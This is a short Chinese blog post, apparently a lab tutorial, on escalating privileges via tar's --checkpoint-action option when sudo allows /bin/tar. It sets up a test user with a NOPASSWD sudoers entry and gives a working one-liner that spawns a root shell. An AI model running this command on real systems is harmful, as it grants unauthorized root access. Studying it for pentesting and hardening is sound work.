tar提权,--checkpoint和--checkpoint-action参数

tar命令拥有root用户或者高权限的执行用户权限时,可以配合--checkpoint--checkpoint-action参数进行权限的提升

环境部署:
创建一个jackson用户并设置密码

useradd jackson
passwd jackson

/etc/sudoers文件中加入该配置项

jackson ALL=(root) NOPASSWD: /bin/tar

切换到jackson用户使用sudo -l查看权限

可以看到jackson用户可以使用tar命令

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

/bin/sh为需要执行的命令,执行whoami

参考:https://gtfobins.github.io/gtfobins/tar/

posted @   Junglezt  阅读(374)  评论(0编辑  收藏  举报
相关博文:
·  THM-Linux提权-权限升级
·  THM-Windows提权 - 权限提升
·  基于tar通配符漏洞的提权方法
·  通过未引用路径的程序来提权
·  靶场VNH练习(5)Breakout
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· Vue3状态管理终极指南:Pinia保姆级教程
历史上的今天:
2022-03-30 vsftpd2.3.4 后门笑脸漏洞
点击右上角即可分享
微信分享提示
AI IDE Trae